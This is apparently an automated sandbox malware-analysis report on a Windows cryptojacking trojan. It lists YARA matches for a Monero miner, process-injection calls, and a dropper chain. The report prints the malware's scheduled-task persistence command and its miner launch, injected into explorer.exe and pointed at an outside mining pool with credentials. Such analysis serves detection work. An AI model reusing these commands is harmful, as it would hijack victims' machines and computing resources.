                  Source: 0000001C.00000000.816102106.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 0000001B.00000000.781428125.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 0000001B.00000000.781428125.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 0000001C.00000000.810219805.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 0000001C.00000000.810219805.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 0000001B.00000000.795242519.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 0000001B.00000000.795242519.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 00000015.00000002.812013124.00000224E7AD9000.00000004.00000001.sdmp, type: MEMORYMatched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, score = https://minergate.com/faq/what-pool-address, modified = 2021-10-26, nodeepdive =
                  Source: 00000015.00000002.812013124.00000224E7AD9000.00000004.00000001.sdmp, type: MEMORYMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 0000001C.00000000.793171664.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 0000001C.00000000.793171664.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 00000015.00000002.821696567.00000224E8D2D000.00000004.00000001.sdmp, type: MEMORYMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 0000001B.00000000.797423384.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 0000001B.00000000.797423384.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 0000001C.00000002.925901333.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 0000001C.00000002.925901333.0000000140000000.00000040.00000001.sdmp, type: MEMORYMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 00000011.00000002.822124457.0000020190009000.00000004.00000001.sdmp, type: MEMORYMatched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, score = https://minergate.com/faq/what-pool-address, modified = 2021-10-26, nodeepdive =
                  Source: 00000011.00000002.822124457.0000020190009000.00000004.00000001.sdmp, type: MEMORYMatched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 0000001C.00000000.787529097.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 0000001C.00000000.787529097.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 0000001B.00000000.800236371.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 0000001B.00000000.800236371.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 0000001C.00000000.813277906.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 0000001C.00000000.813277906.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 0000001B.00000000.787692374.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 0000001B.00000000.787692374.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 0000001C.00000000.779272197.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 0000001C.00000000.779272197.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 0000001B.00000000.789535375.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 0000001B.00000000.789535375.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 0000001B.00000000.784425223.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 0000001B.00000000.784425223.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 0000001B.00000000.773135705.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 0000001B.00000000.773135705.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 0000001C.00000000.789706786.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 0000001C.00000000.789706786.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 00000011.00000003.802096834.00000201F4E40000.00000004.00000001.sdmp, type: MEMORY Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 0000001B.00000000.779800649.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 0000001B.00000000.779800649.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: 0000001B.00000000.769582384.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: 0000001B.00000000.769582384.0000000140000000.00000040.00000001.sdmp, type: MEMORY Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
                  Source: Process Memory Space: conhost.exe PID: 6012, type: MEMORYSTR Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: Process Memory Space: conhost.exe PID: 6840, type: MEMORYSTR Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, score = https://minergate.com/faq/what-pool-address, modified = 2021-10-26, nodeepdive =
                  Source: Process Memory Space: conhost.exe PID: 6840, type: MEMORYSTR Matched rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21 date = 2021-10-24, author = Florian Roth, description = Detects command line parameters often used by crypto mining software, reference = https://www.poolwatch.io/coin/monero, score =
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft.exe Code function: 10_2_00401D58 NtAllocateVirtualMemory,
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft.exe Code function: 10_2_00401D18 NtWriteVirtualMemory,
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft.exe Code function: 10_2_004019D8 NtCreateThreadEx,
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft.exe Code function: 10_2_00401D98 NtProtectVirtualMemory,
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft.exe Code function: 10_2_00401C98 NtClose,
                  Source: C:\Windows\System32\conhost.exe Code function: 17_2_00007FFA3625A30E NtUnmapViewOfSection,
                  Source: C:\Windows\System32\conhost.exe Code function: 21_2_00007FFA3626A3EE NtUnmapViewOfSection,
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe Code function: 22_2_00401D58 NtAllocateVirtualMemory,
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe Code function: 22_2_00401D18 NtWriteVirtualMemory,
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe Code function: 22_2_004019D8 NtCreateThreadEx,
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe Code function: 22_2_00401D98 NtProtectVirtualMemory,
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe Code function: 22_2_00401C98 NtClose,
                  Source: 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe, 00000000.00000003.655959061.000000000370C000.00000040.00000001.sdmp Binary or memory string: OriginalFilenameUrticates.exe4 vs 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe
                  Source: 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe, 00000000.00000002.656396342.00000000000C2000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameUrticates.exe4 vs 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe
                  Source: 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe, 00000000.00000003.653385005.0000000002590000.00000004.00000001.sdmp Binary or memory string: OriginalFilename vs 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe
                  Source: 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe, 00000000.00000003.653385005.0000000002590000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameSV vs 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe
                  Source: 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe, 00000000.00000002.659039815.00000000025F1000.00000040.00000001.sdmp Binary or memory string: OriginalFilename vs 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe
                  Source: 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe, 00000000.00000002.659039815.00000000025F1000.00000040.00000001.sdmp Binary or memory string: OriginalFilenameSV vs 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe
                  Source: 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESERVED size: 0x100000 address: 0x0
                  Source: sistem.exe.1.dr Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESERVED size: 0x100000 address: 0x0
                  Source: 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe Static PE information: Section: ZLIB complexity 1.00044194799
                  Source: 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe Static PE information: Section: ZLIB complexity 1.00537109375
                  Source: 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe Static PE information: Section: ZLIB complexity 1.00051229508
                  Source: 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe Static PE information: Section: ZLIB complexity 1.0107421875
                  Source: sistem.exe.1.dr Static PE information: Section: ZLIB complexity 1.00051229508
                  Source: sistem.exe.1.dr Static PE information: Section: ZLIB complexity 1.00054824561
                  Source: sistem.exe.1.dr Static PE information: Section: ZLIB complexity 1.0107421875
                  Source: sistem.exe.1.dr Static PE information: Section: .rsrc ZLIB complexity 0.995659722222
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe File created: C:\Users\user\AppData\Local\Yandex
                  Source: classification engine Classification label: mal100.troj.spyw.evad.mine.winEXE@39/7@2/3
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe File read: C:\Users\user\Desktop\desktop.ini
                  Source: C:\Users\user\Desktop\982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                  Source: C:\Users\user\AppData\Local\Temp\sistem.exe Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                  Source: 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe Virustotal: Detection: 34%
                  Source: C:\Users\user\Desktop\982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                  Source: unknown Process created: C:\Users\user\Desktop\982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe "C:\Users\user\Desktop\982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe"
                  Source: C:\Users\user\Desktop\982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process created: C:\Users\user\AppData\Local\Temp\sistem.exe "C:\Users\user\AppData\Local\Temp\sistem.exe"
                  Source: C:\Users\user\AppData\Local\Temp\sistem.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process created: C:\Users\user\AppData\Local\Temp\Microsoft.exe "C:\Users\user\AppData\Local\Temp\Microsoft.exe"
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\System32\conhost.exe" "C:\Users\user\AppData\Local\Temp\Microsoft.exe
                  Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\System32\cmd.exe cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\user\AppData\Local\Temp\services64.exe
                  Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\user\AppData\Local\Temp\services64.exe"
                  Source: unknown Process created: C:\Users\user\AppData\Local\Temp\services64.exe C:\Users\user\AppData\Local\Temp\services64.exe
                  Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\System32\cmd.exe cmd" cmd /c "C:\Users\user\AppData\Local\Temp\services64.exe
                  Source: C:\Users\user\AppData\Local\Temp\services64.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\System32\conhost.exe" "C:\Users\user\AppData\Local\Temp\services64.exe
                  Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\services64.exe C:\Users\user\AppData\Local\Temp\services64.exe
                  Source: C:\Users\user\AppData\Local\Temp\services64.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\System32\conhost.exe" "C:\Users\user\AppData\Local\Temp\services64.exe
                  Source: C:\Windows\System32\conhost.exe Process created: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe "C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe"
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\System32\conhost.exe" "/sihost64
                  Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\System32\cmd.exe cmd" cmd /c taskkill /f /PID "6040
                  Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /PID "6040"
                  Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=mine.bmpool.org:6004 --user=6059336 --pass=myminer --cpu-max-threads-hint=50 --cinit-idle-wait=1 --cinit-idle-cpu=80
                  Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=mine.bmpool.org:6004 --user=6059336 --pass=myminer --cpu-max-threads-hint=50 --cinit-idle-wait=1 --cinit-idle-cpu=80
                  Source: C:\Users\user\Desktop\982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process created: C:\Users\user\AppData\Local\Temp\sistem.exe "C:\Users\user\AppData\Local\Temp\sistem.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process created: C:\Users\user\AppData\Local\Temp\Microsoft.exe "C:\Users\user\AppData\Local\Temp\Microsoft.exe"
                  Source: C:\Users\user\AppData\Local\Temp\sistem.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                  Source: C:\Users\user\AppData\Local\Temp\Microsoft.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\System32\conhost.exe" "C:\Users\user\AppData\Local\Temp\Microsoft.exe
                  Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\System32\cmd.exe cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\user\AppData\Local\Temp\services64.exe
                  Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\System32\cmd.exe cmd" cmd /c "C:\Users\user\AppData\Local\Temp\services64.exe
                  Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\user\AppData\Local\Temp\services64.exe"
                  Source: C:\Users\user\AppData\Local\Temp\services64.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\System32\conhost.exe" "C:\Users\user\AppData\Local\Temp\services64.exe
                  Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Local\Temp\services64.exe C:\Users\user\AppData\Local\Temp\services64.exe
                  Source: C:\Windows\System32\conhost.exe Process created: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe "C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe"
                  Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=mine.bmpool.org:6004 --user=6059336 --pass=myminer --cpu-max-threads-hint=50 --cinit-idle-wait=1 --cinit-idle-cpu=80
                  Source: C:\Users\user\AppData\Local\Temp\services64.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\System32\conhost.exe" "C:\Users\user\AppData\Local\Temp\services64.exe
                  Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\System32\cmd.exe cmd" cmd /c taskkill /f /PID "6040
                  Source: C:\Windows\System32\conhost.exe Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=mine.bmpool.org:6004 --user=6059336 --pass=myminer --cpu-max-threads-hint=50 --cinit-idle-wait=1 --cinit-idle-cpu=80
                  Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\System32\conhost.exe" "/sihost64
                  Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe taskkill /f /PID "6040"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
                  Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine, ProcessID from Win32_Process
                  Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine, ProcessID from Win32_Process
                  Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
                  Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine, ProcessID from Win32_Process
                  Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process where Name='explorer.exe'
                  Source: C:\Windows\System32\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( ProcessId = 6040)
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe File created: C:\Users\user\AppData\Local\Temp\sistem.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                  Source: C:\Windows\System32\conhost.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
